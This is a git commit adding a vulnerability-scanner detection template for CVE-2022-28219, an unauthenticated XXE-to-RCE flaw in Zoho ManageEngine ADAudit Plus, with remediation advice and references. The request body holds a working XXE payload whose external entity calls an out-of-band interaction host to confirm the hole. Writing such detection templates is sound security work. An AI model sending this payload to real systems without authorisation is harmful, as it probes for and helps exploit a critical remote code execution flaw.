Add CVE-2022-28219 (#4705)

2022-06-30 12:41:59 +07:00 · 2022-06-30 12:41:59 +07:00 · b2a386d636
parent 18b0f909a8
commit b2a386d636
1 changed files with 42 additions and 0 deletions
--- a/cves/2022/CVE-2022-28219.yaml
+++ b/cves/2022/CVE-2022-28219.yaml
@ -0,0 +1,42 @@
+id: CVE-2022-28219
+
+info:
+  name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
+    unauthenticated XXE attack that leads to Remote Code Execution.
+    This template supports the detection part only, to achieve an
+    XXE to RCE, see reference[2].
+  reference:
+    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
+    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
+  remediation: |
+    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
+    is configured with a dedicated service account with restricted privileges.
+  tags: cve,cve2022,xxe,rce,zoho,manageengine
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/agent/tabs/agentData"
+    headers:
+      Content-Type: application/json
+    body: |
+      [
+        {
+          "DomainName": "{{Host}}",
+          "EventCode": 4688,
+          "EventType": 0,
+          "TimeGenerated": 0,
+          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
+        }
+      ]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"